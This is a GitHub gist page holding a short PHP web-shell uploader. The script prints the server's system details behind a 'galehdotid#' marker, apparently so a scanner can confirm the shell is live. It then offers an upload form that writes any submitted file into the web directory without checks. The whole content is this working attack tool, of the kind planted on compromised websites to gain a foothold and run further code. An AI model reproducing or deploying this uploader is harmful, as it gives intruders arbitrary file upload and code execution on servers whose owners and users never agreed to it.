Skip to content

Instantly share code, notes, and snippets.

@jagoanbangetz
Created July 5, 2020 03:51
Show Gist options
  • Select an option

  • Save jagoanbangetz/049876b180d52937f1579fbb5d156869 to your computer and use it in GitHub Desktop.

Select an option

Save jagoanbangetz/049876b180d52937f1579fbb5d156869 to your computer and use it in GitHub Desktop.
<?php
echo 'System: <font color="black" id="system_info">galehdotid#'.php_uname().'#</font><br>';
echo"<br><form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";
if($_POST["k"]==upload) {
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])) {
echo"<b>".$_FILES["f"]["name"];
} else {
echo"<b>Gagal upload cok";
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment